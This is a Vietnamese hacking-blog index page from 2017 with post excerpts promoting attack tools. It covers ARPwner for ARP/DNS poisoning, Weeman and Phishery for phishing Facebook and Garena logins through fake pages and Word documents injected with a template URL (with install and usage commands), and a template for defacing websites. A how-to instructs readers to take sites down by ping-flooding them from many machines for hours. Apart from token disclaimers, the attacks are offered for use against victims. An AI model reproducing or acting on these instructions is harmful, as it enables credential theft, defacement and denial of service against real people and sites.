Thứ Ba, 3 tháng 10, 2017

ARPwner - Một công cụ tấn công ARP & DNS

ARPwner được phát hành bởi Nicolas Trippar tại BlackHat USA 2012 một công cụ sử dụng mã nguồn python cho phép bạn thực hiện  tấn công ARP poisoning và DNS . Nó có một phiên bản GUI đơn giản, dễ sử dụng và một hệ thống plugin để lọc thông tin thu thập được,hộ trợ SSLstrip. 



Để sử dụng công cụ làm việc bạn cần pypcap

Hướng dẫn cài pypcap

apt-get install python-pypcap



Bạn có thể tải về ARPwner tại đây:https://github.com/ntrippar/ARPwner/archive/master.zip
Đọc thêm »

HACK FACEBOOK GARENA SỬ DỤNG WEEMAN

Việc sử dụng Weeman cho các mục tiêu tấn công mà không có sự đồng ý của cả hai bên là bất hợp pháp. Weeman nhà phát triển không chịu trách nhiệm về bất kỳ thiệt hại gây ra bởi Weeman.


Việc sử dụng Weeman cho các mục tiêu tấn công mà không có sự đồng ý của cả hai bên là bất hợp pháp. Weeman nhà phát triển không chịu trách nhiệm về bất kỳ thiệt hại gây ra bởi Weeman.

Weeman sẽ làm các bước sau:

  1. Tạo trang html giả mạo.
  2. Chờ khách hàng
  3. Lấy dữ liệu (POST).
  4. Hãy thử đăng nhập khách hàng vào trang gốc : Cười:

Yêu cầu

  • Python <= 2.7.
  • Python BeautifulSoup 4

Đọc thêm »

OSINT SPY – Search Engine dành cho Hackers

Chúng ta có thể tìm ra Email / domain / ip_address / organization bằng cách sử dụng OSINT-SPY. Nó được sử dụng để làm những thứ như Data Miners, Infosec Researchers, Penetration Testers và điều tra tội phạm mạng để tìm thông tin của họ.

 OSINT-SPY bao gồm việc thu thập dữ liệu từ nhiều nguồn công cộng khác nhau và API của  OSINT-SPY có thể tìm kiếm thông tin về người, email, tổ chức, vị trí địa lý, tên miền, thiết bị có sẵn công khai trên internet và như vậy.


Tổng quan về công cụ này:
Thực hiện quét trên Địa chỉ IP / tên miền / địa chỉ email / địa chỉ / BTC (bitcoin)
Tìm thông tin bitcoin mới nhất
Liệt kê tất cả các mật mã được hỗ trợ bởi trang web và máy chủ cụ thể
Kiểm tra liệu một trang web cụ thể có dễ có lỗ hổng hay không?
Loại bỏ tất cả các địa chỉ liên lạc và tin nhắn từ cơ sở dữ liệu skype
Phân tích phần mềm độc hại hoặc tệp tin độc hại từ xa

Setup
Python 2.7
Use install_linux.py (for installing all dependencies and libraries on linux)
Use install_windows.py (for installing all dependencies and libraries on windows)



API của nó

Clearbit API
Shodan API
Fullcontact API
Virus_Total API
EmailHunter API

 DOWNLOAD 
Đọc thêm »

Phishery - Sự nguy hiểm của file .Doc

Phishery là gì?


Phishery giống như là một HTTP được Kích hoạt SSL đơn giản với mục đích chính là xác thực thông tin Basic Authentication.
Phishery có thể trên URL vào tài liệu .docx Word.
Sức mạnh của phishery được phát huy tốt nhất bằng cách thiết lập một mẫu của tài liệu Word.

Cài đặt & Cấu hình

Phishery được viết bằng ngôn ngữ lập trình Go và tác giả của công cụ này đã phát hành nhiều phiên bản cho Windows / OSX / Linux.
Tải phiên bản mới nhất tại đây.

Một khi nạn nhân của bạn mở một tệp tin bad.docx Word sau đó nó sẽ kết nối một với URL nhất định (https://fakebook.com). Và sau đó hộp thoại đăng nhập sẽ xuất hiện nếu kết nối được thiết lập.
phishery-first

Install

Extract the archive, and optionally, install binary to $PATH
$ tar -xzvf phishery*.tar.gz
$ cd phishery*
$ cp phishery /usr/local/bin

Usage

$ phishery --help

|\   \\\\__   O         __    _      __
| \_/    o \  o  ____  / /_  (_)____/ /_  ___  _______  __
> _   (( <_ oO  / __ \/ __ \/ / ___/ __ \/ _ \/ ___/ / / /
| / \__+___/   / /_/ / / / / (__  ) / / /  __/ /  / /_/ /
|/     |/     / .___/_/ /_/_/____/_/ /_/\___/_/   \__, /
             /_/ Basic Auth Credential Harvester (____/
                 with Word Doc Template Injector

  Start the server  : phishery -s settings.json -c credentials.json
  Inject a template : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx

  Options:
    -h, --help      Show usage and exit.
    -v              Show version and exit.
    -s              The JSON settings file used to setup the server. [default: "settings.json"]
    -c              The JSON file to store harvested credentials. [default: "credentials.json"]
    -u              The phishery URL to use as the Word document template.
    -i              The Word .docx file to inject with a template URL.
    -o              The new Word .docx file with the injected template URL.
DOWNLOAD
Đọc thêm »

Thứ Hai, 2 tháng 10, 2017

Share Template Hacker

Chào các bạn, chúc các bạn có một ngày tốt lành. Hôm nay mình sẽ chia sẽ cho các bạn một template hacker đẹp mà các bạn có thể dùng để deface web, hay làm cho cá nhân cũng được.
Demo mời các bạn xem ảnh :



Còn đây là link download : Index hacker
Index này có thể tùy biến css giúp các bạn có thêm một lựa chọn cho việc thiết kế website cá nhân.
Oke chào tạm biệt các bạn hẹn gặp lại các bạn vào lần chia sẽ tới của mình. Bye 
Đọc thêm »

Làm thế nào để DDos và làm ngừng hoạt động Website (3 phương pháp)

DDos là gì?

Một kiến ​​thức chính về internet và hàng loạt các trang web mà nó lưu trữ là những máy chủ này được lưu trữ trên máy chủ. Tuy nhiên, thông thường mọi máy chủ web đều bị hạn chế với khả năng cá nhân để xử lý yêu cầu tại một thời điểm nhất định.
DDOS nói nôm na là gửi một lượng lớn dữ liệu hoặc lượng truy cập để làm nghẽn đường truyền, Quá tải Sever máy chủ và nó không phân chia được nữa !
  • Lúc đó Nạn nhân sẽ không thể nào nhận thêm kết nối từ người dùng khác. Hay nói cách khác là sập mạng !
Kể từ khi máy chủ ngừng hoạt động, nó sẽ làm treo trang web hoặc tạm thời ngừng hoạt động. Bí quyết là khi bạn DDos một trang web, nó dẫn đến trang web mất băng thông được phân bổ do đó dẫn đến tai nạn một trang web. Quá tải một mạng với số lượng lớn các yêu cầu đồng thời sẽ dẫn đến việc ngưng truyền tải dữ liệu giữa một máy chủ và một trang web của người sử dụng.

Làm thế nào để DDos Một IP hoặc Website?

Ddos attack
Toàn bộ quá trình này để DDos một IP gây ra một trang web để tạm thời ở trạng thái xuốnghoặc gặp vấn đề không thể truy cập vào máy chủ.
Dưới đây là một vài phương pháp về cách DDoS một website hoặc một IP. Đây là những lệnh được đề cập dưới đây cần phải được theo sau để kết quả sự sụp đổ của một máy chủ.

Làm thế nào để Website DDoS bằng cách sử dụng Command Prompt

Ddos một ip sử dụng cmd

Trang web có phản hồi đường truyền tốt

Tìm một trang web nhỏ và tương thích và bạn muốn tấn công DDos

Check Địa Chỉ IP Của Web Cần Tấn Công

Tìm địa chỉ IP của trang web này.
Để lấy địa chỉ IP này sử dụng lệnh bên dưới 
 Ping www.example.com -t 

Địa chỉ IP

Bạn sẽ nhận được một địa chỉ IP trông tương tự như xxx.xxx.xxx.xxx và có số

Tiếp tục Nhập lệnh sau

Tiếp theo gõ lệnh: ping [xxx.xxx.xxx.xxx] -t -l 65500

Chạy lệnh cho thời gian dài

Bây giờ chạy lệnh này trong một thời gian dài, tốt hơn trong vài giờ. Nếu khả thi sử dụng nhiều máy tính để thực hiện lệnh này cùng một lúc. Và bạn đang thực hiện DDOS 
  • Bạn Ping Đồng Nghĩa với việc bạn gửi dữ liệu đến máy chủ IP đó. Nếu nhiều máy tính là cùng lúc, một trăm máy, hoặc một ngàn máy thì đây sẽ là cuộc tấn công mang tính nguy hiểm quốc tế ! 

Hiện Lỗi Máy chủ không có sẵn khi truy cập trang Web

Trang web sẽ hiển thị thông báo máy chủ không hoạt động hoặc trang web tạm thời”

Dấu hiệu của sự tắt nghẽn trong hệ thống máy chủ !

Xem Thêm Video

Một lưu ý nhanh để nhớ là kết nối internet của bạn nên có một băng thông không giới hạn hoặc nó sẽ dẫn đến mất băng thông để thực hiện nhiệm vụ này, có nghĩa là nếu đường truyền internet nhà bạn yếu, và băng thông thấp -> Mạng nhà bạn sập ( Phản Dame )

Giới Thiệu LOIC Tự động DDos Attack Đối với Website

Làm Thế Nào ?

Sử dụng Bảng tính Google Để DDos một IP hoặc Trang web

Làm Thế Nào ?
Lưu Ý
Hãy lưu ý đây là tài liệu tham khảo học tập để biết thêm kiến thức. AnonyViet không khuyến cáo bất cứ hành động DDOS nào. Đặc biệt không nên DDOS các web chính phủ hoặc có đuôi .edu

Đọc thêm »